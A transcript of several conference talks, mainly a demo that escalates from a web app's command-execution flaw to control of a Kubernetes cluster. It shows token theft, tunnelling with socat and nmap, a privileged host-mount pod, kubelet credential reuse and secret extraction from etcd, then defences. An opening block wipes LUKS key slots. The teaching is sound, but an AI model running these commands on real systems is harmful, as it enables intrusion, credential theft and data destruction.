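The encrypt-then-discard-the-key retirement trick boils down to something like this; /dev/sdX is a placeholder for the retired, LUKS-encrypted OSD device:

    # destroy every LUKS key slot; the ciphertext on disk becomes unrecoverable
    sudo cryptsetup luksErase /dev/sdX      # interactive, asks for confirmation
    # the header may remain, but without a key the data is unreadable
    sudo cryptsetup isLuks /dev/sdX && echo "header intact, data unreadable"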
So thank you so much, and I'll turn it back to Federico for any questions. We have a couple of bookmarks for you; we haven't written out the paths because they're super long, but you'll get the slides in the next few days, so you can just click on them. These are some interesting resources for pretty much everything that we've discussed, to dig down into things like compile-time hardening, which we don't really have the time to go into. At this point, are there any questions in the audience? Yeah. I wanted to ask, you said you delete your logs. Do you overwrite where the logs were, or do you encrypt the logs and then delete them? Is that what you're doing as a standard? It all depends on your configuration, I believe. Yeah, you would have to choose how to do it. But a normal practice would be that you don't store the logs or the monitoring data on the system that you're monitoring. So you're not deleting the logs out of Ceph, you're deleting the logs out of a Linux file system, and you can use the usual sanitizing practices there. If you're not in some very high debug mode, the logs should be pretty clean in terms of not containing anything confidential. But like Anna said, if you're going to keep a history of everything that happened in the cluster, that is potentially a leak, so you want to purge them eventually. Do you do this automatically with Rook? No, the log management is not automatic. That's why aggregating logs is a good best practice, because once you have them in Splunk or rsyslog or whatever tool you use to aggregate the logs, it's much easier for you to manage them at a central point. Thank you. Any other questions? Don't be shy, we've got lots of time. All right, well, thank you everyone, and thank you especially to Federico and Anna. Thank you. Super important, how to keep your stuff safe, and the next session will be a different angle on safety: basically, how to prevent people from hacking into your Kubernetes cluster. Should be exciting. Please join us at two for that. Thanks again. Testing, one, two? Sounds like you can hear me. Oh, and welcome to the two o'clock session of the cloud native track here at SCALE. I am super pleased to introduce Eric Smolling, who is going to have a few exciting demos about how to break into Kubernetes clusters that are perhaps not as well configured as they should be. So I am very much looking forward to it. Please give him a hand and send a prayer to the demo gods on his behalf. Thank you. Eric, take it away. Thank you, thank you everybody for coming. Good, my slides are up, we're good to go. So as she said, I'm Eric Smolling, I'm a senior developer advocate at Snyk, but I'm not really going to be talking about Snyk, so don't worry, this is not a vendor pitch. We're going to talk today about hacking Kubernetes. So you can get a feel for where I come from; you can read that if you want. I'm from a developer background, not an operations background. A lot of Kubernetes folks come from sysops and learned development; I kind of came the other way. I have, depending on how you look at it, about 30 years of software dev and DevOps experience. I'm a Docker Captain, have the CKS, and all that good stuff. I've been using Docker since the early days, like 2013, and I have a tweet of Solomon mocking me publicly that's that old, so you can go check whether I'm telling the truth. If you care, I'm Eric Smolling all over the socials.
But what we're going to talk about today, and forgive me if I keep touching this, this is my notes and I'll be doing things with it, so sorry, I have to have that in front of me, but you know how it is. We're going to be talking today about how the combination of app vulnerabilities and misconfigurations can allow an attacker to spread the blast radius of their attack. And of course we're going to be talking about this in the context of Kubernetes, because that's what almost every talk today is. That pattern, exploit then expansion, is how most of these attacks come about. An application vulnerability gives an attacker the initial foothold, and then infrastructure-level misconfigurations allow that attacker to spread into other parts of your system. So we're going to walk through going from an app vulnerability to basically owning a cluster. Now, we only have 45-ish minutes, so this isn't going to be a full-on huge demonstration. It's going to be fairly contrived, on rails, so you can follow along. But what I'd like you to see is some of the things that, if you stand up a Kubernetes cluster and don't think about them, don't customize, don't configure, can bite you, and what you can do to head those things off. So, setting the scene. We're going to pretend that we are a hacker and we have found this vulnerable server out on the internet. We don't know much else about it other than that it has this particular vulnerability. For the purposes of this demonstration, this is just a mock Flask app that we wrote that has a remote command execution vulnerability. What that means is it's going to allow me to run commands directly on the server where that web app is running. It's a simple Flask app, honestly. But these kinds of vulnerabilities do exist in the wild, in software like Tomcat or, gosh, Spring Boot, or basically anything in Java if you were running Log4j last year. A hacker can pass malformed or specifically crafted requests over HTTP or whatever that allow them to run commands on that server. While we go through this, I'm going to have this timeline of doom that shows where we are as we go along, starting from the left, where we have found a vulnerable container, and as we move right, we'll see the things that lead up to an escalated exploit. So, enough of slides. Let me get over to the wonderful hackable app. Of course, this is very contrived, again. Understand that this could very well be any RCE you've seen out there. But I've done it this way so that it's easy to see from the point of view of the audience. The way this RCE works is, we have found that if we pass a cmd parameter into this web admin context, you can pass a string into it and it's going to run it. It's pretty bad. So, I just ran whoami on, well, technically this is running over here on this machine. Because I'm not brave enough to tempt the demo gods that much, I'm running kind on Docker Desktop, just on that machine. I'm using this machine so that you can see that, A, because it's an Intel machine and I have some images that aren't cross-architecture, and this M1 machine has problems with that, but B, so that you can see I don't have Docker Engine running over here; I don't have anything running here that you're going to be looking at. It's all remotely connecting over there. So, what I've hit is the front end of that.
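Roughly what the attacker's requests look like; the hostname and query parameter below are stand-ins, since the demo app's real route isn't shown here:

    # run a command on the server through the RCE
    curl 'http://vulnerable-app.example.com/webadmin?cmd=whoami'
    # dump the pod's environment variables
    curl 'http://vulnerable-app.example.com/webadmin?cmd=env'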
I just passed a command in. One of the most interesting commands I might run as a hacker is one to see what I can get out of your environment variables. And here, is that big enough, or do you need me to grow that? Oh, is it cut off? Okay. Yeah, let me drag this. Better, better. Cool. So, here are all the environment variables in the environment of that Flask app. And there's a ton of Kubernetes ones. So that's an aha: I'm running in a container, I'm on Kubernetes. I can also see other things about it. But one of the interesting ones you can see from this point of view is this KUBERNETES_SERVICE_HOST. There's another one here, actually, that I usually look for: the Kubernetes port, right up top. So, this internal 10.x IP address, that is the API server from the point of view of this pod. That is the control plane. If you're not a Kubernetes expert, that is where you send commands to Kubernetes to do things; it's the API endpoint. So, what else can we find out? Let me copy this. I'd kind of like to know what IP address I'm at. So, I just did an ip a, and it looks like I'm at 10.244.162.135 inside that cluster. This is the pod's IP address. Interesting to know. What else can I find out? Let me open another one of these, and actually I'm gonna copy from my notes over here because it's easier than typing. This is what happens when a presenter gets off script; I have to find it in my notes. Sorry about that. Live demos, folks, it's the way you do it. So, I've got that, I've figured out what IP I'm at, and I'm ignoring my slides because slides are boring. I'm now going to cat something that is too long for me to type. So, copying. Copying from the iPad, that's always fun. Paste it right into here. Come on, Apple. All right, look at that magic. What is that? That is a token. What I've done is I've gone to the default place for the service account token for a pod. That is the credential, if you will, that this pod can use to talk to that API server. Now, those of you who are Kubernetes savvy may know that in versions 1.23 or older, that defaulted to true, to auto-mount that token in every pod that you start. Thankfully, Kubernetes has made that default to false starting in 1.24. This is a 1.23 cluster. In fact, if you run on most Kubernetes clusters, you're not going to be on 1.24. That's why I continue to show it right now. Oh, I'm sorry, I'll grow that so you can see it. That's just EKS, which I pulled as an example. If you're starting up an EKS cluster, you're probably still on 1.22 or earlier. Many clusters you're going to see out there are still running an older version, because 1.24, that's bleeding-edge crazy. Who would run something that's brand new? Well, if you're not on it, and you're not explicitly setting automountServiceAccountToken to false in your service account definition, you're going to have this thing available in basically every pod out there. Well, what can I do with that? Let me go back to our timeline. What do we know right now? We know we can hit this thing on port 80 from the outside. We know from the port information in those environment variables that it looks like there's a service listening on 5000. We know the IP address of the pod. And now we know that we have the pod's token, because it's available to us inside that pod.
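The defensive setting he's referring to lives on the service account; the name and namespace below are hypothetical:

    kubectl apply -f - <<'EOF'
    apiVersion: v1
    kind: ServiceAccount
    metadata:
      name: web-admin            # hypothetical service account name
      namespace: secure
    automountServiceAccountToken: false   # don't inject the API token into this SA's pods
    EOF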
So now I'm going to take another string, copy it over here, do, do, do, copy. Come on, copy. I'm gonna go back and overwrite this one. So what this is, you can see in the larger text here at the top, is that I've run curl. Curl's in my image, yay, I can use it, fun. Now that I have that token, I can pass it into the Authorization bearer header, the token that we found earlier. And I'm assuming the CA cert is right next to it, because that's the default place for it as well. And I hit that endpoint IP, and I go after the default namespace endpoints. And sure enough, I got a response. So, the token's good, the API endpoint's good, and I can get at the default endpoints. Now, why do I care about endpoints? Because it's often open; that's a good one to check. But another interesting thing here, if I scroll to the bottom: you see that IP address? That would be the publicly facing IP of the API server. And you see port 6443 on that IP. Now, in this demo, that's not reachable, because I'm running inside of Docker Desktop, which wraps things in all the layers that you have with kind and everything. So I'm not gonna actually use that IP here, but if this was a kubeadm-started Kubernetes cluster in your development environment, say you started it up in a sandbox off of your vSphere, that very well would be available. Luckily, and I'll throw this in, most managed Kubernetes clusters do not expose it that way. So, managed Kubernetes clusters for the win. However, let's take what we've found here. Actually, I should show my slides, because we're moving along the timeline of doom. We now know that the internal IP of the API server works and that the pod token allows access to that endpoints API. So let's go back to what we had here. I'm getting kind of tired of using this RCE website, because it's cumbersome. I'd like to actually get at this server from a command line. So I'm gonna copy this whole token. I'm gonna come out here, and just like I said earlier, just to prove a point, I am not connected to a Docker engine at this point, and, I have kubectl aliased, if I try to get something, I'm not connected to a Kubernetes cluster at this time. I do have in this directory a little setup script that will create a kubeconfig from a token, just because I'm too lazy to write one myself, and I'm gonna use the hostname I know. This is where I would use that IP address if this was a regular Kubernetes cluster. Are we cutting off? Sorry. Better? Cool. So basically I just created a kubeconfig file. I'm going to export that into, oops. Ah. Is it, oh, is it off the bottom? Okay. Give me a second. Let's fix the overscan. Come on, grab the corner. Are we there? Okay. Clear that. We're gonna export, oh gosh, my history is all screwed up. There we go. That exports my KUBECONFIG, and now if I try to get something, it is going to, demo gods, please work. Hey, that's actually a good sign. I'm getting an error from the server, so I am connecting to the Kubernetes cluster, and that token is actually working. It's just telling me that I'm not allowed. It tried to pull pods in the default namespace, and it's saying you're forbidden, you can't do that. That's craziness; why would we let you do that? But it exposed something interesting to me. If you look at this error, let me grow that font some, it says that the user system:serviceaccount:secure:web-admin can't do this. The namespace secure is where that pod is running.
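That little setup script is doing roughly this, with standard kubectl config commands; the server address is a placeholder for the hostname he knows:

    TOKEN='<token lifted from the pod>'
    kubectl config set-cluster target --server=https://127.0.0.1:6443 \
      --insecure-skip-tls-verify=true
    kubectl config set-credentials stolen --token="$TOKEN"
    kubectl config set-context target --cluster=target --user=stolen
    kubectl config use-context target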
So let's try this: get pod -n secure. Don't confuse the word secure with meaning secure here. This is just the name of the namespace. Naming your namespace secure does not make it secure. So I was able to do a get pod on the secure namespace, and I got one. Let's see what else I can do. Let's do an auth can-i, oops, can-i --list. We're gonna pass the token in. I think I still have it on my clipboard. Let me go copy that again. Copy, paste. I'm gonna have to shrink that font just a little to make it fit better. So, if you're familiar with can-i, it's basically asking the API server, what can I do? What can I, using that token, do? And that user, in the default namespace, because I didn't provide one, is able to, let me shrink it a little more because it's so ugly, endpoints, as we saw earlier: it can do any of the verbs on endpoints in the default namespace. But really, there's very little I can do with the other resources with this. But if I use the same command and I pass in namespace secure, you can see the very first resource is the wildcard, with create, get, watch, list, patch, delete, deletecollection, and update. I can do a whole bunch in this namespace with that service account, using that token. So that's handy. Let's see, skipping through some notes here. Well, let's look at what we know about this now. We now know that there is a secure namespace, and there's always a default namespace, so we have some namespace data. And let's see if I can use this. Okay, get pod -n secure, so I can see the name of it again. Let's do an exec -it in the secure namespace, and I don't have my autocomplete configured, so just copy and paste, and I want to run bash. Yay, I can do that. By default, I am the web admin user. That's good; at least I'm not root. That's somebody who's been listening to one of my talks. Let's see if I can sudo. No, sudo's not available, that's good. They at least didn't have that in there. Let's see, where am I? I'm in /usr/src. Let's see if I can make a file. I can, so I am in a read-write file system. Why does that matter? Well, let's go back to our little slides. Oh, I skipped one here. I was talking about the fact that our role has too many permissions, honestly. This pod probably does not need all of those permissions, especially if this is a business application; it probably doesn't need any of them. You don't need to be talking to the API server if you're an e-commerce app, most likely. You probably don't even need to know you're running on Kubernetes. So limit your permissions as appropriate. The read-write file system piece, though. What that means, the read-write root file system: when Docker or containerd or whatever starts up a container, it layers a read-write file system at the top, on top of the read-only image. That's where all your mutation happens. So if you make a file, create a file, edit a file, it does a copy-on-write, brings the thing up to that read-write layer, and makes the mutations there. If you pass Docker, for instance, --read-only, or in Kubernetes, if you use a security context and set readOnlyRootFilesystem to true, it just doesn't put that read-write layer there. This is not a silver bullet, but it does make it harder for a hacker to hide their tracks, customize your app configurations, delete logs, do things to modify that container.
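In pod terms, the hardening he's describing is a single field in the container's security context; the pod below is a hypothetical example using an image that tolerates a read-only root:

    kubectl apply -f - <<'EOF'
    apiVersion: v1
    kind: Pod
    metadata:
      name: hardened-example     # hypothetical pod
    spec:
      containers:
      - name: app
        image: busybox           # illustrative image
        command: ["sleep", "3600"]
        securityContext:
          readOnlyRootFilesystem: true   # no writable layer for an attacker to abuse
    EOF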
If I happen to be root in that container and it's a read-write file system, I can very likely run apt-get inside that container and start installing other tools in the space of the container. Now, you may have detection for that kind of thing with intrusion detection systems or whatever, but it's better to head it off than react to it when it happens, in my opinion. So that being said, let's see if we can get our privileges extended. So this is just showing, we know we have a PSP, oh, that's actually, I'm skipping ahead. Don't look at that slide. Let's see if we can do more. So I have a few manifests here I'd like to try to apply. Let's get out of the exec and I'll show you one of them. We're going to look at demo-yamls, the root-pod YAML. This is a simple Alpine image I wanna start up, and I know that by default that Alpine image runs as root. So I wanna see if I can get an image in there that'll get me root in a container on this cluster. So let's do an apply -f into the secure namespace. Oops, put the file after the -f, Eric. Demo-yamls, root-pod. And it says it created it. Let's do a get pods on the secure namespace to see what's going on. CreateContainerConfigError, hmm. Well, let's do a describe, let's see what's going on here. Describe pod, secure, root-pod. Error: container has runAsNonRoot and image will run as root. So the kubelet, when it tried to start this container up, detected that the default user is UID 0 and said, oh no, we don't allow that. Now, why did it say that? Well, we probably have a pod security policy or something in place to restrict that. And before anyone says pod security policies are going away, I know that; we'll talk about that in a minute. But you can see in the annotations, sure enough, a PSP resource called restricted has been annotated onto this pod. So we have a PSP, and that was the giveaway here. I'm actually gonna delete that root pod so we don't have it sitting around trying to start. I've got another one, of course. We'll look at demo-yamls. Which one am I doing now? We're gonna do the non-root-priv one. Let me make this a little bit bigger. Here we have an image called sneaky that we're going to try to deploy, and it actually wants to start in the privileged context: I wanna be a privileged container, and I wanna do some nasty things with mounting of volumes here. So let's try applying that non-root-priv. Immediately got an error. This is a pod security policy; we had good evidence we had one before, and this one tells you right here: pod security, unable to admit pod, privileged containers are not allowed. And by default, that's normal. Most places would restrict that. But let's try something else. I'm going to run another one: demo-yamls, non-root-non-priv. This is the same thing without the privilege or the volume mounts. Same image. So we'll go ahead and apply it into secure. It says it created it, and it's running. So we have that running. Now, I'm just gonna go ahead and exec into this. This is in secure, it's called sneaky. So there we are. We are inside the sneaky pod. And I'm going to, you know, say whoami. I am the user sneaky, because again, runAsNonRoot is set, so it can't run as root. But this is my image. I do have sudo in there, and now I'm root. So why was I allowed to do that? If privileged is disallowed, why can I do that? Well, that is because, and this isn't really actually that clear in the Kubernetes documentation, surprisingly.
If you set your security context to privileged: false, that does not set allowPrivilegeEscalation to false for you. That one is not defaulted to false; it allows escalation, as you can see. So what we see here is a pod security policy that, A, grants too many permissions, you shouldn't be allowed to do a lot of this stuff, and that especially does not restrict allowPrivilegeEscalation. So that's the next step in our timeline of doom: now we're root in a container in your cluster. So what can we do in a container? Let's go back over here. I would like to know the IP address I'm at right now: 10.244.162.141. If we go back to our prior window, let me show that, and rerun ip a. So this one is 10.244.162.135, and this one is .141. So I know I'm in the same subnet; I've got my bearings, I'm in the right place. But now I'd like to poke around. I want to see what's going on in here. So I'm gonna copy another command over here, because I can't type this long one. Copy, clear my screen. Oops, that is not what I wanted to copy. Sorry guys. Copy, Apple. Okay, we're gonna start typing. We're gonna run Nmap. If you're not familiar with Nmap, this is a tool for scanning networks. And we know that our service is listening on 5000. I'd like to know if there are any other copies of this app out there. --open, on the 10-dot, what was that? I have to go back and look at my IP address: 10.244.162.0/24. So we're poking around. Because I'm root in a container, I can do this. That's one of the things you need elevated privileges to be able to do. And of course, this is gonna sit here and take forever. Come on. Oh, it did not find one. Oh, that's not good. That's not what I wanted in my demo. Hold on a second. Do, do, do. What did I do wrong? Sorry, maybe I have to give it my IP. That would be weird. I'm also not a network engineer. What I am expecting this to return is another IP address listening on port 5000. And because we've been looking around in this network, and we know that only one pod is running in the secure namespace, that means it's somewhere else. And why is this not working? I'm sorry? There are, right, but one of them is the sneaky pod. Right, but what I'm looking for, let me copy this whole IP, maybe I'm just doing this wrong, I've slept since I got this far in my demo, what I'm looking for is another of the exploitable applications running in another namespace. And normally, oh, sure enough, there it is. Oh gosh, see, I'm blind. You go blind on stage, folks. Sorry about that. So yes, 135 is the original one, and that's the one we see here. Thank you. 136, I'm gonna bring you up here and hand you the keyboard. 136 is something else. Somebody else is running at 136, and I'd like to find out who that is and what's going on there. So in order to do that, in this exec, I am gonna run socat. Socat, socket cat, is like a tunneling tool, if you will. It's more than that, but that's what I'm gonna use it for. We're gonna do a socat, and, I'm getting lost in my own notes, I scrolled it off my screen. We wanna do a TCP listen on 5001, which is an open port, with reuseaddr and fork, and we wanna send the traffic to 10.244.162.136 on port 5000. So we've got the socat listener going right now, right there.
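For reference, the two halves of the tunnel look roughly like this; the pod name is a stand-in, and the second command is what he runs next from the laptop:

    # inside the sneaky pod: listen on 5001 and relay to the hidden app
    socat TCP-LISTEN:5001,reuseaddr,fork TCP:10.244.162.136:5000
    # on the attacker's laptop: forward localhost:5001 into the sneaky pod
    kubectl -n secure port-forward pod/sneaky 5001:5001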
And now what we need to do on our local console: I'm gonna open another tab and get out of fish, because fish doesn't like me today. Am I in the right directory? I'm gonna go to work, git, and I am going to do a, this is what happens when you have too many laptops. We wanna do a k port-forward into the sneaky pod, oh wait, hold on, export, there we go. K port-forward into the sneaky pod at port 5001 in the secure namespace. So if you're not familiar with that command, kubectl has now reached out to the sneaky pod, because we have that token, we can get to it, the same token that we exec'd with, and we have opened up a tunnel from my localhost where kubectl is running, on 5001. Traffic hitting localhost at 5001 will hit the sneaky pod at 5001, where we in turn have a socat tunnel listening at 5001, pointing at whatever that thing is on 5000. So I'm gonna go back to my browser, open a new tab, and hit localhost 5001. Same app, surprise, surprise. Some developer apparently is running another copy of the app elsewhere in the cluster. So we're gonna do the same kind of thing here, and, actually I just copied from over here, run the same thing against the front end of that, and there's the token from wherever that's running. So let's go back now to our command line, and, actually I don't need to open another tab, and I don't need my port-forward after that. Let's get out of there, and we're just gonna edit this kubeconfig file. Oops, where am I? Vi, demo kubeconfig, oh, it's just not visible, there we go. I'm gonna comment that out, paste that in. Is that indented right? I think so. And now I'm able to get pods in default, because that guy is running in default. Because this is a development cluster, maybe, this is some place where he, or she, has access to deploy into the default namespace. I think you can see where we're going. So, what have we found? No network controls are in place. The Nmap bit, besides the fact that I was able to get in as root and run Nmap, and could probably have installed it if I needed to, shows I obviously don't have any network policies in place, or other firewalling, keeping me from perusing around outside of my namespace, or places I shouldn't go. And this technically could have been somewhere else, but it's nice that it was in the default namespace for me. We found a pod listening on 5000 somewhere, determined that it's in the default namespace by going and getting its token and using that, and we were able to access pods in the default namespace. So now, I'd like to see if I can get a privileged pod into the default namespace. So we'll come back to the command line, and let's go back over here, and I'm just gonna go ahead and get out, we don't need that socat anymore, or anything, so I'm gonna get out of there, and I'm going to do a k apply into the demo-yamls, why, oh, I'm not out of the pod, sorry. K apply, demo-yamls, and we're gonna go back to that non-root privileged manifest I showed you earlier, but we're gonna deploy it to default, and sure enough, that worked.
That's because the default namespace wasn't restricted by the pod security policy that was in place, and this is more common than you may think, because developers writing an application for their namespace will often craft their pod security policy, or other restrictions, for that namespace and deploy it to that namespace. And if your cluster ops aren't restricting defaults, default won't be restricted. And sure enough, somebody decided to start the app in default, I was able to get in there through all the things we've said, and now I've got a pod running in default. So let's go ahead and exec into that, do-do-do-do, go into non-root-priv... oops, that's not bash... there we go. And I am able to become root. And if you remember from that manifest, we were mounting the root filesystem from the host, and we put it into... well, there's more in there than I thought; there's a lot of stuff in there. We have a volume that's mounted at /chroot, hence the name. Because if I do a... let's do this, let me do a ps x to make this more dynamic. If I do a ps right now, I'm in the process namespace for this container, so all I'm seeing is the processes running in this container. That GoTTY: there's another piece of the demo I could be showing, where I could get a web TTY, but that was too fancy for me. But if I now do a chroot, which changes the root (change root) of the current shell to whatever I tell it, and I change it to the directory that the /chroot volume is mounted at, and then do that same ps x again: there are all the PIDs on the host. Because the way ps works is it looks at the /proc filesystem for that kind of stuff, and the /proc filesystem in this container, effectively for this shell, is now the one that's on the host. I now have basically host access on this worker node. So that's bad enough, but what more can we do? So let's come back and see what we've got. We have no restriction on the default namespace in the PSP; that's obviously bad. Now, what do we wanna get at? We wanna get at etcd, right? If you're in a Kubernetes cluster, you wanna get to etcd, because that's the keeper of all things, and that's over in the kube-system namespace. We're not there yet, but we do have a privileged container over here in the default namespace. So let's see what we can do to continue to expand this exploit. So what I wanna do is, from this pod, I wanna try to connect to kube-system; I wanna get at something in kube-system. In order to do that: I know my sneaky pod has kubectl installed in it, so I have the tool, but I need a key that can get me a token that can get me over there, and the default token's not gonna do it. But what is on every node that might have it, especially if you have root access to the host volume? I'm not gonna cd to it, but I'm going to export KUBECONFIG to /etc/kubernetes/kubelet.conf. That's the default place where kubeadm, or most people, will install the credentials that the kubelet uses to do its things, to talk to the API server. So now if I do a kubectl get pods in the kube-system namespace, I can see them. Ooh, in fact, kubectl get nodes: yay, I can do that. So, I already showed you the slide of what we now have... well, I've shown you the privilege part, I don't wanna show that again. I need to see something here, though: let's do a kubectl describe pod in the kube-system namespace. I wanna take a look at that etcd pod on kind-control-plane. Is that right? Yes, that's right.
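(Condensed, the pivot he just walked through looks something like this, assuming the manifest mounted the host's / at /chroot as described, and that the host's /proc came along with that mount, as it did here:)

    kubectl exec -it non-root-priv -- bash   # pod name as in the demo manifest
    ps x             # only this container's processes are visible
    chroot /chroot   # re-root the shell onto the host filesystem mount
    ps x             # now reads the host's /proc: every PID on the worker node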
What I'm looking for here is where on the control-plane host the PKI is, the certs for etcd; the etcd-certs volume is the standard place, but I know where it is. It also shows me it's on the node kind-control-plane. So that's interesting. So let's see. I'm gonna come back out here to my other shell, I'm back out on my laptop now, and I'd like to try to apply with the token I have... oh wait, I'm sorry, I'm skipping around my notes. One moment. Oh yeah, sorry. Okay: back in my sneaky pod, if I try to do a kubectl run, I'm gonna try to start up a pod, just a busybox: --image=busybox, --restart=Never, and a shell. Forbidden. I knew that was gonna happen; that's the first thing I would try. But I can't do that, because the kubelet, ironically enough, cannot start pods. It can start containers, but it's actually restricted by default from creating pods. Now, I could go edit /etc/kubernetes/manifests and add a static pod to that, a shadow pod (mirror pod, sorry), and start one that way, but that's no fun, I don't wanna mess with that. So what I'm gonna do is this. I've got, obviously, tons of YAML, and I'm going to run another one that is an etcd client. You can see that this is going to start the Kubernetes etcd image, and it's going to set a bunch of things; I've already filled this in with the info we saw there, and it's going to try to connect to the etcd endpoint and get access to things. So let's do... ten minutes? Oh, I am hitting my time, okay. k exec... not exec, sorry, k apply; see, now you've got me all flustered, showing me the time. -f demo yamls, etcd-client. So we're gonna start up this etcd client in default, and we're gonna exec in there with the etcd client. Thank you, this is why pair programming works. And I'm just gonna type this because I know where it is: /usr/local/bin/etcdctl member list. Oops, maybe I don't know where it is... what did I type wrong? /usr/local/bin/etcdctl, okay. So we did get a good connection; even though it didn't like this and gave this warning, we did get a connection. So now I'm going to modify that: instead of doing a member list, I'm going to do a get with --keys-only, from key, and grep. What do we want? We want secrets, of course; that's what you always want out of etcd. And there's the list of the names of all the secrets. Yeah, well, the one I care about is... let's see, where is it? The cluster-role-aggregation-controller token. What can I do with that? Let's copy this line, copy, edit this, and I'm going to do an etcdctl get on that. Right, right, right: there's a token. Let's see what I can get with this, and grab from there to there, and we'll do a k auth can-i --list. I'm running out of time, so I'm just gonna get to the end of this quick: "you must be logged in to the server", hmm.
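(For reference, the credential pivot and the etcd queries go roughly like this; the endpoint and certificate paths are the usual kubeadm/kind defaults and may differ on other clusters:)

    # borrow the kubelet's credentials from the host filesystem
    export KUBECONFIG=/etc/kubernetes/kubelet.conf
    kubectl get pods -n kube-system
    kubectl get nodes

    # from the etcd-client pod: list keys, then read a token straight out of etcd
    ETCDCTL_API=3 etcdctl --endpoints=https://<control-plane-ip>:2379 \
      --cacert=/etc/kubernetes/pki/etcd/ca.crt \
      --cert=<client cert> --key=<client key> \
      get / --prefix --keys-only | grep secret

    # then check what the stolen token is allowed to do
    kubectl --token=<token pulled from etcd> auth can-i --list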
You know what's probably happened is something has been upgraded behind my back and it's no longer vulnerable... hmm, come on, demo, do your thing. There it is; it just didn't like the annotation at the end. So what we can see here is cluster roles: rbac.authorization.k8s.io, escalate, get, list, patch, update, watch. And all that Greek means you are God on this cluster with that token. So if we go back to our notes: we were able to get over there, cluster rights gained, and that is the end of your cluster, as far as you know. So how could we have prevented this? I talked all throughout about some of the things you could do about this, but the first thing is: scan your application code. Don't let RCEs get into your... do your best to not let RCEs get in there. And honestly, that contrived Flask app: if I throw it through a Python static analysis scanner (I know ours catches it, but they should all catch that, and sure enough ours does), it'll say high vulnerability here, you're running a command from unparsed input, don't do that. Scan your container images for the same reason. Scan your Kubernetes YAML for best practices; there are tons of scanners out there, use them. Don't trust your defaults; be explicit about things. Specify your pod security policies, or admission control, or whatever, to not allow privilege escalation. Use network policies; they are your friend. I know, as developers, when a lot of us think network firewall rules, it seems complicated, I have to open tickets for that, but network policies are really not that complicated. Doing them right takes work, but you wanna make sure you're using that tool that's available to you. And use admission control. I mentioned PSP as being deprecated; it's gonna be removed in the next release, it's been deprecated since 1.21, I believe, and Pod Security admission is coming along. But the admission controllers that are popular out there today, your OPA Gatekeeper, your Kyverno: you can do a lot of the same things with those tools, and they're very popular, there's a ton of support out there for them. So use some kind of admission control to enforce what you would normally do with PSP, as well as a lot of these other things. And don't let people deploy to the default namespace. Just don't. Finally, I just wanna give thanks to a bunch of people. I've only listed a few here, but everybody in SIG Security: Mark Manning, Ian Coldwater, Duffie Cooley, Kris Nóva, all these people out there. A lot of what I've learned here, what we've presented to you, I've learned from listening to these people. So SIG Security, TAG Security, OpenSSF: all these groups are there to help us learn security and implement it well, so I just wanna thank them all and tell you to join our SIGs, hang out with us. And now, with the time I have left, I'm open for any questions you might throw at me. I'm gonna take a drink. Yeah, awesome, please raise your hand if you have any questions, and I will come over with the microphone and hold it for you, to avoid contact. All right, let's start with you over here. Thanks for the great talk, that was awesome. Can you give us any examples of, like, a safe default configuration we can just set up? I know it's a silly question, but just something for a complete security dummy, like: use this on your Kube cluster and at least you're not gonna be stupid.
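(To make a couple of the fixes above concrete, and as a partial answer to this question: a minimal sketch, not a complete hardening guide, with the namespace and names as placeholders:)

    # in the pod spec: don't trust the defaults, say it explicitly
    securityContext:
      runAsNonRoot: true
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
    ---
    # per-namespace default deny: nothing in or out until a policy allows it
    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: default-deny
      namespace: my-app
    spec:
      podSelector: {}
      policyTypes: ["Ingress", "Egress"]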
Without pitching for anybody or any single project: there are a lot of Kube scanners to scan your clusters and tell you whether or not your cluster itself is meeting CIS standards or other standards; kube-bench is one of them. In fact, if you're doing the CKA, take the CKS too, get your CKS cert; you will learn a lot about these kinds of things. But there are a lot of tools out there to implement these, from many vendors. Particularly Snyk, actually... well, we don't do runtime stuff, so I'm not gonna pitch us; I'm gonna say look at the open source projects that are out there. If you are on a managed Kubernetes from a distribution, often they will bake these things in, because that's why you're paying them. So on EKS, GKE, many of these things that I did aren't as easy to do, because they've already set some of this; you would have to undo some of the things they're doing to attack them. So I would say pay attention to the vendor you're using for your Kubernetes, and don't be undoing things. So if, for instance, the service account token auto-mount change that is going live in 1.24: when 1.24 gets rolled out, if your apps all break because they're trying to talk to the API server, question why. Talk to your developers: why do you need to talk to the API server? Why do you even know you're on Kubernetes? Are you doing a monitoring tool? Okay, let's talk. Are you doing a business application? WTF, why are you even aware that you're in a container? So, that kind of stuff. Does that help? Anyone else? Well, cool, we'll all be around afterwards; we get a break after this, so I'll be hanging out. If you have any questions, like I said, join us: SIG Security, TAG Security, OpenSSF, supply chain security, all those things, I hang out. Yeah, I promise the Kubernetes community is super friendly, super welcoming. Thank you so much, Eric. We will be back here in half an hour, after the afternoon break; I believe that is 3:30 for our next talk, and I'm just gonna peek... oh yeah, exploring memory usage and I/O performance. So hope to see you back; please enjoy the rest of the conference. I know that we have a tradition of chatting after a talk, so please feel free to come up and hang out. Thanks, Eric. Testing, mic is off. It was the best meetup that I have ever been to. Why? Two reasons. First of all, it was the first time that I realized how much I love DevOps, and the second reason was that it was the first time that I ever said out loud that I believe that every developer should practice DevOps. And now that I've said it, now we can really start talking. So hi, my name is Noaa Barki. I am a developer advocate, and I've been a full-stack developer for about seven years. I am also a tech writer, one of the leaders of the GitHub Israel community, which is the largest GitHub community in the whole universe, and I work at an amazing company called Datree, where we help developers and DevOps engineers prevent Kubernetes misconfigurations from ever reaching production. Now, why am I telling you all of this? Because before we launched Datree, we wanted to learn as much as possible about the common misconfigurations and the pitfalls. Yep, works. Good afternoon, SCaLE. Welcome back to the cloud-native track.
It is... these are the final few sessions for the Friday, for today, which is, I think, Friday. And if it is, in fact, Friday, it is my deep pleasure to introduce Frits Hoogland, here from the Netherlands, to talk to us about, basically (you see it on the screen) memory usage and file I/O. And I think there will actually be exciting demos; he already mentioned that, so I'm going to be very excited. Please be kind during the demonstrations, and I look forward to your talk. Thank you. Thank you. Thank you all for joining me. My name is Frits Hoogland. As you can hear from my pronunciation, I'm from the Netherlands, so like you said, please bear with me; English is not my first language. I work for a company called Yugabyte, and Yugabyte is a distributed database, which is a very interesting technology and actually a great match with the cloud and with stuff like Kubernetes, because we created it from the ground up for that. And one of the things that I have been looking into, and have been talking about with a lot of clients in my role as developer advocate, is how to configure things. And that is what this talk is about: Linux and disk I/O, and disk I/O performance in relation to memory. And that is actually really interesting. If you look at Postgres: Postgres uses I/O in a way where Linux memory is really important, so I think this is a talk which is really good for Postgres people to look into too. And... oh my God, what is it? If you look at cloud-native applications, meaning running in the cloud, what you typically see is that you try to use machines as small as possible. As small as possible means the lowest number of CPUs, because that's cheaper, but 